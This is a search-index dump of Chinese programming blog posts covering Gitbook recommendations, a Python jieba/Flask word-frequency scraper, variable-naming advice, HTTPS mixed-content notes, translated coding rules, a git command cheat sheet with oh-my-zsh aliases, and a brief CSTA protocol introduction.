Front-End Developer Handbook 2017 地址:https://frontendmasters.com/books/front-end-handbook/2017/ 这是任何人都可以用来了解前端开发实践的指南。它大致概述并讨论了前端工程的实践:如何学习它,以及在2017年实践时使用什么工具。\n这是专门为潜在的和目前实践的前端开发人员提供专业资源,以配备学习材料和开发工具。其次,管理者,首席技术官,导师和猎头人士可以使用它来了解前端开发的实践。\n手册的内容有利于网络技术(HTML,CSS,DOM和JavaScript)以及直接构建在这些开放技术之上的解决方案。本书中引用和讨论的材料是课堂上最好的或目前提出的问题。\n该书不应被视为对前端开发人员可用的所有资源的全面概述。这本书的价值被简单,集中和及时地组织起来,仅仅是足够的绝对信息,以免任何人在任何一个特定的主题上压倒一切。\n目的是每年发布一次内容更新。\n手册分为三部分。\n第一部分。前端实践\n第一部分广泛描述了前端工程的实践。\n第二部分:学习前端发展\n第二部分指出了自主导向和直接的资源,用于学习成为前端开发人员。\n第三部分:前端开发工具\n第三部分简要解释和识别交易工具。\n2. JS函数式编程指南 英文版地址: 中文版地址:https://llh911001.gitbooks.io/mostly-adequate-guide-chinese/content/\n这本书的主题是函数范式(functional paradigm),我们将使用 JavaScript 这个世界上最流行的函数式编程语言来讲述这一主题。有人可能会觉得选择 JavaScript 并不明智,因为当前的主流观点认为它是一门命令式(imperative)的语言,并不适合用来讲函数式。但我认为,这是学习函数式编程的最好方式,因为:\n你很有可能在日常工作中使用它\n这让你有机会在实际的编程过程中学以致用,而不是在空闲时间用一门深奥的函数式编程语言做一些玩具性质的项目。\n你不必从头学起就能开始编写程序\n在纯函数式编程语言中,你必须使用 monad 才能打印变量或者读取 DOM 节点。JavaScript 则简单得多,可以作弊走捷径,因为毕竟我们的目的是学写纯函数式代码。JavaScript 也更容易入门,因为它是一门混合范式的语言,你随时可以在感觉吃力的时候回退到原有的编程习惯上去。\n这门语言完全有能力书写高级的函数式代码\n只需借助一到两个微型类库,JavaScript 就能模拟 Scala 或 Haskell 这类语言的全部特性。虽然面向对象编程(Object-oriented programing)主导着业界,但很明显这种范式在 JavaScript 里非常笨拙,用起来就像在高速公路上露营或者穿着橡胶套鞋跳踢踏舞一样。我们不得不到处使用 bind 以免 this 不知不觉地变了,语言里没有类可以用(目前还没有),我们还发明了各种变通方法来应对忘记调用 new 关键字后的怪异行为,私有成员只能通过闭包(closure)才能实现,等等。对大多数人来说,函数式编程看起来更加自然。+\n以上说明,强类型的函数式语言毫无疑问将会成为本书所示范式的最佳试验场。JavaScript 是我们学习这种范式的一种手段,将它应用于什么地方则完全取决于你自己。幸运的是,所有的接口都是数学的,因而也是普适的。最终你会发现你习惯了 swiftz、scalaz、haskell 和 purescript,以及其他各种数学偏向的语言。\n3. 前端开发笔记本 地址:http://chanshuyi.github.io/frontend_notebook/\n前端开发笔记本涵括了大部分前端开发所需的知识点,主要包括5大部分:《页面制作》、《JavaScript程序设计》、《DOM编程》、《页面架构》、《前端产品架构》。","title":"Gitbook好书推荐"},{"content":"1. 环境 win7 64位 python 3.5 2. 目标 抓取一篇报纸,并提取出关键字,然后按照出现次数排序,用echarts在页面上显示出来。\n3. 
工具选择 因为之前对nodejs的相关工具比较熟悉,在用python的时候,也想有类似的工具。所以就做了一个对比的表格。\n功能 nodejs版 python版 http工具 request requests 中文分词工具 node-segment, nodejieba(一直没有安装成功过) jieba(分词准确度比node-segment好) DOM解析工具 cheeio pyquery(这两个工具都是有类似jQuery那种选择DOM的接口,很方便) 函数编程工具 underscore.js underscore.py(underscore来处理集合比较方便) 服务器 express flask 4. 开始的噩梦:中文乱码 感觉每个学python的人都遇到过中文乱码的问题。我也不例外。\n首先要抓取网页,但是网页在控制台输出的时候,中文总是乱码。搞了好久,搞得我差点要放弃python。最终找到解决方法。 解决python3 UnicodeEncodeError: \u0026lsquo;gbk\u0026rsquo; codec can\u0026rsquo;t encode character \u0026lsquo;\\xXX\u0026rsquo; in position XX\n过程很艰辛,但是从中也学到很多知识。\nimport io import sys sys.stdout = io.TextIOWrapper(sys.stoodout.buffer,encoding=\u0026#39;gb18030\u0026#39;) 5. 函数式编程: 顺享丝滑 #filename word_rank.py import requests import io import re import sys import jieba as _jieba # 中文分词比较优秀的一个库 from pyquery import PyQuery as pq #类似于jquery、cheerio的库 from underscore import _ # underscore.js python版本 sys.stdout = io.TextIOWrapper(sys.stdout.buffer,encoding=\u0026#39;gb18030\u0026#39;) # 解决控制台中文乱码 USELESSWORDS = [\u0026#39;的\u0026#39;,\u0026#39;要\u0026#39;,\u0026#39;了\u0026#39;,\u0026#39;在\u0026#39;,\u0026#39;和\u0026#39;,\u0026#39;是\u0026#39;,\u0026#39;把\u0026#39;,\u0026#39;向\u0026#39;,\u0026#39;上\u0026#39;,\u0026#39;为\u0026#39;,\u0026#39;等\u0026#39;,\u0026#39;个\u0026#39;] # 标记一些无用的单词 TOP = 30 # 只要前面的30个就可以了 def _remove_punctuation(line): # 移除非中文字符 # rule = re.compile(\u0026#34;[^a-zA-Z0-9\\u4e00-\\u9fa5]\u0026#34;) rule = re.compile(\u0026#34;[^\\u4e00-\\u9fa5]\u0026#34;) line = rule.sub(\u0026#39;\u0026#39;,line) return line def _calculate_frequency(words): # 计算分词出现的次数 result = {} res = [] for word in words: if result.get(word, -1) == -1: result[word] = 1 else: result[word] += 1 for word in result: if _.contains(USELESSWORDS, word): # 排除无用的分词 continue res.append({ \u0026#39;word\u0026#39;: word, \u0026#39;fre\u0026#39;: result[word] }) return _.sortBy(res, \u0026#39;fre\u0026#39;)[::-1][:TOP] # 降序排列 def _get_page(url): # 获取页面 return requests.get(url) def 
_get_text(req): # 获取文章部分 return pq(req.content)(\u0026#39;#ozoom\u0026#39;).text() def main(url): # 入口函数,函数组合 return _.compose( _get_page, _get_text, _remove_punctuation, _jieba.cut, _calculate_frequency )(url) 6. python服务端:Flask浅入浅出 import word_rank from flask import Flask, request, jsonify, render_template app = Flask(__name__) app.debug = True @app.route(\u0026#39;/rank\u0026#39;) # 从query参数里获取pageUrl,并给分词排序 def getRank(): pageUrl = request.args.get(\u0026#39;pageUrl\u0026#39;) app.logger.debug(pageUrl) rank = word_rank.main(pageUrl) app.logger.debug(rank) return jsonify(rank) @app.route(\u0026#39;/\u0026#39;) # 主页面 def getHome(): return render_template(\u0026#39;home.html\u0026#39;) if __name__ == \u0026#39;__main__\u0026#39;: app.run() 7. 总结 据说有个定律:凡是能用JavaScript写出来的,最终都会用JavaScript写出来。 我是很希望这样啦。但是不得不承认,python上有很多非常优秀的库。这些库在npm上并没有找到合适的替代品。\n所以,我就想: 如何能用nodejs直接调用python的第三方库\n目前的解决方案有两种,第一,只用nodejs的child_process。这个方案我试过,但是不太好用。\n第二,npm里面有一些包,可以直接调用python的库。例如:node-python, python.js, 但是这些包我在win7上安装的时候总是报错。而且解决方法也蛮麻烦的。索性我就直接用python了。\n最后附上项目地址:https://github.com/wangduanduan/read-newspaper\n","permalink":"https://wdd.js.org/posts/2019/10/rmsqoa/","summary":"1. 环境 win7 64位 python 3.5 2. 目标 抓取一篇报纸,并提取出关键字,然后按照出现次数排序,用echarts在页面上显示出来。\n3. 工具选择 因为之前对nodejs的相关工具比较熟悉,在用python的时候,也想有类似的工具。所以就做了一个对比的表格。\n功能 nodejs版 python版 http工具 request requests 中文分词工具 node-segment, nodejieba(一直没有安装成功过) jieba(分词准确度比node-segment好) DOM解析工具 cheerio pyquery(这两个工具都是有类似jQuery那种选择DOM的接口,很方便) 函数编程工具 underscore.js underscore.py(underscore来处理集合比较方便) 服务器 express flask 4. 开始的噩梦:中文乱码 感觉每个学python的人都遇到过中文乱码的问题。我也不例外。\n首先要抓取网页,但是网页在控制台输出的时候,中文总是乱码。搞了好久,搞得我差点要放弃python。最终找到解决方法。 解决python3 UnicodeEncodeError: \u0026lsquo;gbk\u0026rsquo; codec can\u0026rsquo;t encode character \u0026lsquo;\\xXX\u0026rsquo; in position XX\n过程很艰辛,但是从中也学到很多知识。\nimport io import sys sys.stdout = io.TextIOWrapper(sys.stdout.buffer,encoding=\u0026#39;gb18030\u0026#39;) 5. 
函数式编程: 顺享丝滑 #filename word_rank.py import requests import io import re import sys import jieba as _jieba # 中文分词比较优秀的一个库 from pyquery import PyQuery as pq #类似于jquery、cheerio的库 from underscore import _ # underscore.","title":"python实战 报纸分词排序"},{"content":"在小朱元璋出生一个月后,父母为他取了一个名字(元时惯例):朱重八,这个名字也可以叫做朱八八。我们这里再介绍一下,朱重八家族的名字,都很有特点。\n朱重八高祖名字:朱百六; 朱重八曾祖名字:朱四九; 朱重八祖父名字:朱初一; 他的父亲我们介绍过了,叫朱五四。 取这样的名字不是因为朱家是搞数学的,而是因为在元朝,老百姓如果不能上学和当官就没有名字,只能以父母年龄相加或者出生的日期命名。(登记户口的人一定会眼花)\u0026ndash;《明朝那些事儿》\n那么问题来了,朱四九和朱百六是什么关系? 你可能马上懵逼了。所以说:命名不仅仅是一种科学,更是一种艺术。\n1. 名副其实 // bad var d; // 分手的时间,以天计算 // good var daysAfterBrokeUp; // 分手以后,以天计算 2. 避免误导 // bad var nameList = \u0026#39;wdd\u0026#39;; // List一般暗指数据是数组,而不应该赋值给字符串 // good var nameList = [\u0026#39;wdd\u0026#39;,\u0026#39;ddw\u0026#39;,\u0026#39;dwd\u0026#39;]; // // bad var ill10o = 10; //千万不要把i,1,l,0,o,O放在一起,傻傻分不清楚 // good var illOne = 10; 3. 做有意义的区分 // bad var userData, userInfo; // Data和Info, 有什么区别????, 不要再用data和info这样模糊不清的单词了 // good var userProfile, userAcount 4. 使用读得出来的名称 // bad var beeceearrthrtee; // 你知道怎么读吗? 鼻涕阿三?? // good var userName; 5. 使用可搜索的名称 // bad var e = \u0026#39;not found\u0026#39;; // 想搜e, 就很难搜 // good var ERROR_NO_FOUND = \u0026#39;not found\u0026#39;; 6. 方法名一概是动词短语 // good function createAgent(){} funtion deleteAgent(){} function updateAgent(){} function queryAgent(){} 7. 尽量不要用单字母名称, 除了用于循环 // bad var i = 1; // good for(var i=0; i\u0026lt;10; i++){ ... } // very good userList.forEach(function(user){ ... }); 8. 每个概念对应一个词 controller和manager, 没什么区别,要用controller都用controller, 要用manager都用manager, 不要混着用 9. 建立项目词汇表, 不要随意创造名称 user, agent, org, queue, activity, device... 10. 参考资料 《代码整洁之道》 《明朝那些事儿》 ","permalink":"https://wdd.js.org/posts/2019/10/ouvbom/","summary":"在小朱元璋出生一个月后,父母为他取了一个名字(元时惯例):朱重八,这个名字也可以叫做朱八八。我们这里再介绍一下,朱重八家族的名字,都很有特点。\n朱重八高祖名字:朱百六; 朱重八曾祖名字:朱四九; 朱重八祖父名字:朱初一; 他的父亲我们介绍过了,叫朱五四。 取这样的名字不是因为朱家是搞数学的,而是因为在元朝,老百姓如果不能上学和当官就没有名字,只能以父母年龄相加或者出生的日期命名。(登记户口的人一定会眼花)\u0026ndash;《明朝那些事儿》\n那么问题来了,朱四九和朱百六是什么关系? 
你可能马上懵逼了。所以说:命名不仅仅是一种科学,更是一种艺术。\n1. 名副其实 // bad var d; // 分手的时间,以天计算 // good var daysAfterBrokeUp; // 分手以后,以天计算 2. 避免误导 // bad var nameList = \u0026#39;wdd\u0026#39;; // List一般暗指数据是数组,而不应该赋值给字符串 // good var nameList = [\u0026#39;wdd\u0026#39;,\u0026#39;ddw\u0026#39;,\u0026#39;dwd\u0026#39;]; // // bad var ill10o = 10; //千万不要把i,1,l,0,o,O放在一起,傻傻分不清楚 // good var illOne = 10; 3. 做有意义的区分 // bad var userData, userInfo; // Data和Info, 有什么区别????, 不要再用data和info这样模糊不清的单词了 // good var userProfile, userAccount 4. 使用读得出来的名称 // bad var beeceearrthrtee; // 你知道怎么读吗? 鼻涕阿三?? // good var userName; 5.","title":"代码整洁之道 - 有意义的命名"},{"content":"1. HTTPS域向HTTP域发送请求会被浏览器直接拒绝,HTTP向HTTPS则不会 例如在github pages页面,这是一个https页面,如果在这个页面向http发送请求,那么会直接被浏览器拒绝,并在控制台输出下面的报错信息。\njquery-1.11.3.min.js:5 Mixed Content: The page at \u0026#39;https://wangduanduan.github.io/ddddddd/\u0026#39; was loaded over HTTPS, but requested an insecure XMLHttpRequest endpoint \u0026#39;http://cccccc/\u0026#39;. This request has been blocked; the content must be served over HTTPS. 如果你在做第三方集成的系统,如果他们是在浏览器中直接调用你提供的接口,那么最好你使用https协议,这样无论对方是https还是http都可以访问。(相信我,这个很重要,我曾经经历过上线后遇到这个问题,然后连夜申请证书,把http升级到https的痛苦经历)\n2. HTTPS的默认端口是443,而不是80 如果443端口已经被其他服务占用了,那么使用其他任何没有被占用的端口都可以用作HTTPS服务,只不过在请求的时候需要加上端口号罢了。\n","permalink":"https://wdd.js.org/network/of5hny/","summary":"1. HTTPS域向HTTP域发送请求会被浏览器直接拒绝,HTTP向HTTPS则不会 例如在github pages页面,这是一个https页面,如果在这个页面向http发送请求,那么会直接被浏览器拒绝,并在控制台输出下面的报错信息。\njquery-1.11.3.min.js:5 Mixed Content: The page at \u0026#39;https://wangduanduan.github.io/ddddddd/\u0026#39; was loaded over HTTPS, but requested an insecure XMLHttpRequest endpoint \u0026#39;http://cccccc/\u0026#39;. This request has been blocked; the content must be served over HTTPS. 如果你在做第三方集成的系统,如果他们是在浏览器中直接调用你提供的接口,那么最好你使用https协议,这样无论对方是https还是http都可以访问。(相信我,这个很重要,我曾经经历过上线后遇到这个问题,然后连夜申请证书,把http升级到https的痛苦经历)\n2. 
HTTPS的默认端口是443,而不是80 如果443端口已经被其他服务占用了,那么使用其他任何没有被占用的端口都可以用作HTTPS服务,只不过在请求的时候需要加上端口号罢了。","title":"可能被遗漏的https与http的知识点"},{"content":"原文地址:https://hackernoon.com/few-simple-rules-for-good-coding-my-15-years-experience-96cb29d4acd9#.ddzpjb80c\n嗨,我的工作作为一个程序员超过15年,并使用许多不同的语言,范例,框架和其他狗屎。我想和大家分享我写好代码的规则。\n1. 优化VS可读性 去他妈的优化 始终编写易于阅读且对开发人员可理解的代码。因为在硬可读代码上花费的时间和资源将远远高于从优化中获得的。如果你需要进行优化,那么使它像DI的独立模块,具有100%的测试覆盖率,并且不会被触及至少一年。\n2. 架构第一 我看到很多人说“我们需要快速做事,我们没有时间做架构”。其中约99%的人因为这样的想法而遇到了大问题。编写代码而不考虑其架构是没有用的,就像没有实现它们的计划一样,梦想你的愿望。在编写代码的第一行之前,你应该明白它将要做什么,它将如何使用,模块,服务如何相互工作,它将有什么结构,如何进行测试和调试,以及如何更新。\n3. 测试覆盖率 测试是好事,但他们并不总是负担得起,对项目有意义。\n当你需要测试:\n当你编写模块时,微服务将不会被触及至少一个月。 当你编写开源代码。 当你编写涉及金融渠道的核心代码或代码。 当您有代码更新的同时更新测试的资源。 当你不需要测试时:\n当你是一个创业。 当你有小团队和代码更改是快速。 当你编写的脚本,可以简单地通过他们的输出手动测试。 记住,带有严格测试的代码可能比没有测试的代码更有害。\n4. 保持简单,极度简单 不要编写复杂的代码。更多更简单,那么更少的错误它可能有和更少的时间来调试它们。代码应该做的只是它需要没有非常多的抽象和其他OOP shit(尤其是涉及java开发人员)+ 20%的东西可能需要在将来以简单的方式更新它。\n5. 注释 出现注释说明你的代码不够好。好的代码应该是可以理解的,没有一行注释。但是如何为新开发人员节省时间? - 编写简单的内联文档描述什么和如何方法工作。这将节省很多时间来理解,甚至更多 - 它将给人们更多的机会来提出更好的实施这种方法。并且它将是全球代码文档的良好开端。\n6. 硬耦合VS较小耦合 始终尝试使用微服务架构。单片软件可以比微服务软件运行得更快,但只能在一个服务器的上下文中运行。微服务使您可以不仅在许多服务器上,而且有时甚至在一台机器上(我的意思是过程分发)高效地分发您的软件。\n7. 代码审查 代码审查可以是好的,也可以是坏的。您可以组织代码审查,只有当您有开发人员了解95%的代码,谁可以监控所有更新,而不浪费很多时间。在其他情况下,这将是只是耗时,每个人都会讨厌这个。\n在这部分有很多问题,所以更深入地描述这一点。\n许多人认为代码审查是一个很好的方式教新手,或者工作在不同部分的代码的队友。但是代码审查的主要目标是保持代码质量,而不是教学。让我们想象你的团队制作代码用于控制核反应堆或太空火箭发动机的冷却系统。你在非常硬的逻辑中犯了巨大的错误,然后你给这个代码审查新的家伙。你怎么认为会发生意外的风险? - 我的练习率超过70%。\n良好的团队是每个人都有自己的角色,负责确切的工作。如果有人想要理解另一段代码,那么他去一个负责任去问他。你不可能知道一切,更好的优秀的理解小块代码而不是理解所有。\n8. 重构没啥用 在我的职业生涯中,我听到很多次“不要担心,我们以后会重构它”。在未来,这会导致大的技术债务或从头开始删除所有的代码和写作。\n所以,不要得到一个债务,除非你有钱从头开发你的软件几次。\n9. 当你累了或在一个坏的心情不要写代码。 当开发人员厌倦时,他们正在制造2到5倍或者更多的bug。所以工作更多是非常糟糕的做法。这就是为什么越来越多的国家思考6小时工作日,其中一些已经有了。精神工作不同于使用你的二头肌。\n10. 不要一次写全部 - 使开发迭代 在编写代码之前,先分析和预测您的客户真正需要什么,然后选择您可以在短期内以高质量开发的MVF(最有价值的功能)。使用这样的迭代来部署质量更新,而不是把时间和资源浪费在不合理的愿望上、牺牲质量。\n11. 
自动化VS手动 自动化是长期的100%成功。所以如果你有资源自动化的东西,现在应该做。你可能认为“只需要5分钟,为什么我应该自动化?但让我计算这个。例如,它是5个开发人员的日常任务。 5分钟_ 5天_ 21天* 12个月= 6 300分钟= 105小时= 13.125天〜5250 $。如果你有40 000名员工,这将需要多少费用?\n12. 出去浪,学习新爱好 差异化工作可以增加心智能力,并提供新想法。所以,暂停现在的工作,出去呼吸一下新鲜空气,与朋友交谈,弹吉他等。ps: 莫春者,春服既成,冠者五六人,童子六七人,浴乎沂,风乎舞雩,咏而归。------《论语.先进》。\n13. 在空闲时间学习新事物 当人们停止学习时,他们开始退化。\n","permalink":"https://wdd.js.org/posts/2019/10/corgz1/","summary":"原文地址:https://hackernoon.com/few-simple-rules-for-good-coding-my-15-years-experience-96cb29d4acd9#.ddzpjb80c\n嗨,我的工作作为一个程序员超过15年,并使用许多不同的语言,范例,框架和其他狗屎。我想和大家分享我写好代码的规则。\n1. 优化VS可读性 去他妈的优化 始终编写易于阅读且对开发人员可理解的代码。因为在硬可读代码上花费的时间和资源将远远高于从优化中获得的。如果你需要进行优化,那么使它像DI的独立模块,具有100%的测试覆盖率,并且不会被触及至少一年。\n2. 架构第一 我看到很多人说“我们需要快速做事,我们没有时间做架构”。其中约99%的人因为这样的想法而遇到了大问题。编写代码而不考虑其架构是没有用的,就像没有实现它们的计划一样,梦想你的愿望。在编写代码的第一行之前,你应该明白它将要做什么,它将如何使用,模块,服务如何相互工作,它将有什么结构,如何进行测试和调试,以及如何更新。\n3. 测试覆盖率 测试是好事,但他们并不总是负担得起,对项目有意义。\n当你需要测试:\n当你编写模块时,微服务将不会被触及至少一个月。 当你编写开源代码。 当你编写涉及金融渠道的核心代码或代码。 当您有代码更新的同时更新测试的资源。 当你不需要测试时:\n当你是一个创业。 当你有小团队和代码更改是快速。 当你编写的脚本,可以简单地通过他们的输出手动测试。 记住,带有严格测试的代码可能比没有测试的代码更有害。\n4. 保持简单,极度简单 不要编写复杂的代码。更多更简单,那么更少的错误它可能有和更少的时间来调试它们。代码应该做的只是它需要没有非常多的抽象和其他OOP shit(尤其是涉及java开发人员)+ 20%的东西可能需要在将来以简单的方式更新它。\n5. 注释 出现注释说明你的代码不够好。好的代码应该是可以理解的,没有一行注释。但是如何为新开发人员节省时间? - 编写简单的内联文档描述什么和如何方法工作。这将节省很多时间来理解,甚至更多 - 它将给人们更多的机会来提出更好的实施这种方法。并且它将是全球代码文档的良好开端。\n6. 硬耦合VS较小耦合 始终尝试使用微服务架构。单片软件可以比微服务软件运行得更快,但只能在一个服务器的上下文中运行。微服务使您可以不仅在许多服务器上,而且有时甚至在一台机器上(我的意思是过程分发)高效地分发您的软件。\n7. 代码审查 代码审查可以是好的,也以是坏的。您可以组织代码审查,只有当您有开发人员了解95%的代码,谁可以监控所有更新,而不浪费很多时间。在其他情况下,这将是只是耗时,每个人都会讨厌这个。\n在这部分有很多问题,所以更深入地描述这一点。\n许多人认为代码审查是一个很好的方式教新手,或者工作在不同部分的代码的队友。但是代码审查的主要目标是保持代码质量,而不是教学。让我们想象你的团队制作代码用于控制核反应堆或太空火箭发动机的冷却系统。你在非常硬的逻辑中犯了巨大的错误,然后你给这个代码审查新的家伙。你怎么认为会发生意外的风险? - 我的练习率超过70%。\n良好的团队是每个人都有自己的角色,负责确切的工作。如果有人想要理解另一段代码,那么他去一个负责任去问他。你不可能知道一切,更好的优秀的理解小块代码而不是理解所有。\n8. 重构没啥用 在我的职业生涯中,我听到很多次“不要担心,我们以后会重构它”。在未来,这会导致大的技术债务或从头开始删除所有的代码和写作。\n所以,不要得到一个债务,除非你有钱从头开发你的软件几次。\n9. 
当你累了或在一个坏的心情不要写代码。 当开发人员厌倦时,他们正在制造2到5倍或者更多的bug。所以工作更多是非常糟糕的做法。这就是为什么越来越多的国家思考6小时工作日,其中一些已经有了。精神工作不同于使用你的二头肌。\n10. 不要一次写全部 - 使开发迭代 在编写代码分析和预测之前,您的客户/客户真正需要什么,然后选择您可以在短期内以高质量开发的MVF(最有价值的功能)。使用这样的迭代来部署质量更新,而不是腰部时间和资源对不合理的愿望和牺牲与质量。\n11. 自动化VS手动 自动化是长期的100%成功。所以如果你有资源自动化的东西,现在应该做。你可能认为“只需要5分钟,为什么我应该自动化?但让我计算这个。例如,它是5个开发人员的日常任务。 5分钟_ 5天_ 21天* 12个月= 6 300分钟= 105小时= 13.125天〜5250 $。如果你有40 000名员工,这将需要多少费用?","title":"【译】13简单的优秀编码规则(从我15年的经验)"},{"content":"如果命令行可以解决的问题,就绝对不要用GUI工具。快点试用Git bash吧, 别再用TortoiseGit了。\n1. 必会8个命令 下面的操作都是经常使用的,有些只需要做一次,有些是经常操作的\ngit命令虽然多,但是经常使用的不超过8个。\n命令 执行次数 说明 git clone http://sdfjslf.git 每个项目只需要执行一次 //克隆一个项目 git fetch origin round-2 每个分支只需要执行一次 //round-2分支在本地不存在,首先要创建一个分支 git checkout round-2 多次 // 切换到round-2分支 git branch --set-upstream-to=origin/round-2 每个分支只需要执行一次 // 将本地round-2分支关联远程round-2分支 git add -A 每次增加文件都要执行 // 在round-2下创建了一个文件, 使用-A可以添加所有文件到暂存区 git commit -am \u0026quot;我增加了一个文件\u0026quot; 每次提交都要执行 // commit git push 每次推送都要执行 //最好是在push之前,使用git pull拉去远程代码到本地,否则有可能被拒绝 git pull 每次拉去都要执行 拉去远程分支代码到本地并合并到当前分支 2. 常用的git命令 假设你在master分支上\n// 将本地修改后的文件推送到本地仓库 git commit -am \u0026#39;修改了一个问题\u0026#39; // 将本地仓库推送到远程仓库 git push 2.1. 状态管理 2.1.1. 状态查看 查看当前仓库状态\ngit status 2.2. 分支管理 2.2.1. 分支新建 基于当前分支,创建test分支\n// 创建dev分支 git checkout dev // 创建dev分支后,切换到dev分支 git checkout -b dev // 以某个commitId为起点创建分支 git checkout -b new-branch-name commit-id 2.2.2. 分支查看 查看远程分支: git branch -r\n// 查看本地分支 git branch // 查看远程分支 git branch -r // 查看所有分支 git branch -a 2.2.3. 分支切换 切换到某个分支: git checkout 0.10.7\n\u0026gt; git checkout 0.10.7 Branch 0.10.7 set up to track remote branch 0.10.7 from origin. Switched to a new branch \u0026#39;0.10.7\u0026#39; 2.2.4. 分支合并 将master分支合并到0.10.7分支: git merge\n\u0026gt; git merge master Merge made by the \u0026#39;recursive\u0026#39; strategy. 
public/javascripts/app-qc.js | 83 +++++++++++++++++++++++++-- views/menu.html | 1 + views/qc-template-show-modal.html | 114 ++++++++++++++++++++++++++++++++++++++ views/qc-template.html | 7 ++- 4 files changed, 198 insertions(+), 7 deletions(-) create mode 100644 views/qc-template-show-modal.html // 有时候只想合并某次commit到当前分支,而不是合并整个分支,可以使用 cherry-pick 合并 git cherry-pick commitId 2.2.5. 分支删除 // 删除远程dev分支 git push --delete origin dev // 删除本地dev分支 git branch -D dev 2.2.6. 拉取本地不存在的远程分支 // 假设现在在master分支, 我需要拉取远程的dev分支到本地,而本地没有dev分支 // 拉取远程分支到本地 git fetch origin 远程分支名:本地分支名 git fetch origin dev:dev // 切换到dev分支 git checkout dev // 本地dev分支关联远程dev分支, 如果不把本地dev分支关联远程dev分支,则执行git pull和git push命令时会报错 git branch --set-upstream-to=origin/dev // 然后你就可以在dev分支上编辑了 2.3. 版本对比 // 查看尚未暂存的文件更新了哪些部分 git diff // 查看某两个版本之间的差异 git diff commitID1 commitID2 // 查看某两个版本的某个文件之间的差异 git diff commitID1:filename1 commitID2:filename2 2.4. 日志查看 git log git shortlog 2.5. 撤销修改 2.5.1. 撤销处于修改状态的文件 如果你修改了某个文件,但是还没有commit到本地仓库。\ngit checkout -- somefile.js 2.5.2. 丢弃所有未提交的改变 git clean 用来删除未跟踪的新创建的文件或者文件夹\ngit checkout . \u0026amp;\u0026amp; git clean -xdf\ngit clean\n-x 不读取gitignore中的忽略规则 -d 删除所有未跟踪的文件和文件夹 -f 强制 3. 
oh-my-zsh中常用的git缩写 alias ga=\u0026#39;git add\u0026#39; alias gb=\u0026#39;git branch\u0026#39; alias gba=\u0026#39;git branch -a\u0026#39; alias gbd=\u0026#39;git branch -d\u0026#39; alias gcam=\u0026#39;git commit -a -m\u0026#39; alias gcb=\u0026#39;git checkout -b\u0026#39; alias gco=\u0026#39;git checkout\u0026#39; alias gcm=\u0026#39;git checkout master\u0026#39; alias gcp=\u0026#39;git cherry-pick\u0026#39; alias gd=\u0026#39;git diff\u0026#39; alias gfo=\u0026#39;git fetch origin\u0026#39; alias ggpush=\u0026#39;git push origin $(git_current_branch)\u0026#39; alias ggsup=\u0026#39;git branch --set-upstream-to=origin/$(git_current_branch)\u0026#39; alias glgp=\u0026#39;git log --stat -p\u0026#39; alias gm=\u0026#39;git merge\u0026#39; alias gp=\u0026#39;git push\u0026#39; alias gst=\u0026#39;git status\u0026#39; alias gsta=\u0026#39;git stash save\u0026#39; alias gstp=\u0026#39;git stash pop\u0026#39; alias gl=\u0026#39;git pull\u0026#39; alias glg=\u0026#39;git log --stat\u0026#39; alias glgp=\u0026#39;git log --stat -p\u0026#39; alias glgga=\u0026#39;git log --graph --decorate --all\u0026#39; // 图形化查看分支之间的发展关系 oh-my-zsh git命令缩写完整版\n4. 参考文献 git 命令参考 《Pro Git 中文版》 廖雪峰 git教程 猴子都能懂的GIT入门 ","permalink":"https://wdd.js.org/posts/2019/10/gmb0oi/","summary":"如果命令行可以解决的问题,就绝对不要用GUI工具。快点试用Git bash吧, 别再用TortoiseGit了。\n1. 必会8个命令 下面的操作都是经常使用的,有些只需要做一次,有些是经常操作的\ngit命令虽然多,但是经常使用的不超过8个。\n命令 执行次数 说明 git clone http://sdfjslf.git 每个项目只需要执行一次 //克隆一个项目 git fetch origin round-2 每个分支只需要执行一次 //round-2分支在本地不存在,首先要创建一个分支 git checkout round-2 多次 // 切换到round-2分支 git branch --set-upstream-to=origin/round-2 每个分支只需要执行一次 // 将本地round-2分支关联远程round-2分支 git add -A 每次增加文件都要执行 // 在round-2下创建了一个文件, 使用-A可以添加所有文件到暂存区 git commit -am \u0026quot;我增加了一个文件\u0026quot; 每次提交都要执行 // commit git push 每次推送都要执行 //最好是在push之前,使用git pull拉去远程代码到本地,否则有可能被拒绝 git pull 每次拉去都要执行 拉去远程分支代码到本地并合并到当前分支 2. 常用的git命令 假设你在master分支上\n// 将本地修改后的文件推送到本地仓库 git commit -am \u0026#39;修改了一个问题\u0026#39; // 将本地仓库推送到远程仓库 git push 2.1. 
状态管理 2.","title":"gitbash生存指南 之 git常用命令与oh-my-zsh常用缩写"},{"content":"免费产品的盈利模式有四种\n投放广告 增值服务:先把羊养肥,再慢慢割羊毛,现在大部分都是互联网服务都是这种 交叉补贴: A服务免费,在用户使用A服务时,通过提供B服务来盈利 零边际成本:免费提供A服务,但是用户需要用物品去交换A服务,服务提供者通过加工物品来盈利 ","permalink":"https://wdd.js.org/posts/2019/10/ce03id/","summary":"免费产品的盈利模式有四种\n投放广告 增值服务:先把羊养肥,再慢慢割羊毛,现在大部分都是互联网服务都是这种 交叉补贴: A服务免费,在用户使用A服务时,通过提供B服务来盈利 零边际成本:免费提供A服务,但是用户需要用物品去交换A服务,服务提供者通过加工物品来盈利 ","title":"免费服务的盈利模式"},{"content":"1. 实验准备 T450笔记本 2. 进入BIOS 重启电脑 一直不停按enter 按F1 选择Keyboard/mouse 3. 恢复F1-F12原始功能: F1-F12 as primary function [enabled]\n4. 切换ctrl和fn的位置: fn and ctrl key swap [enabled]\n5. 保存,退出 ","permalink":"https://wdd.js.org/posts/2019/10/qzbgvf/","summary":"1. 实验准备 T450笔记本 2. 进入BIOS 重启电脑 一直不停按enter 按F1 选择Keyboard/mouse 3. 恢复F1-F12原始功能: F1-F12 as primary function [enabled]\n4. 切换ctrl和fn的位置: fn and ctrl key swap [enabled]\n5. 保存,退出 ","title":"thinkpad 系列恢复F1-F12原始功能,切换ctrl和fn的位置"},{"content":"1. 内容概要 CSTA 协议与标准概述 CSTA OpenScape 语音架构概述 2. CSTA 协议标准 2.1. 什么是 CSTA ? CSTA:电脑支持通讯程序(Computer Supported Telecommunications Applications) 基本的呼叫模型在 1992 建立,后来随着行业发展,呼叫模型也被加强和扩展,例如新的协议等等 CSTA 是一个应用层接口,用来监控呼叫,设备和网络 CSTA 创建了一个通讯程序的抽象层: CSTA 并不依赖任何底层的信令协议 E.g.H.323,SIP,Analog,T1,ISDN,etc. CSTA 并不要求用户必须使用某些设备 E.g.intelligentendpoints,low-function/stimulusdevices,SIPSignalingmodels-3PCC vs. Peer/Peer 适用不同的操作模式 第三方呼叫控制 一方呼叫控制 CSTA 的设计目标是为了提高各种 CSTA 实现之间的移植性 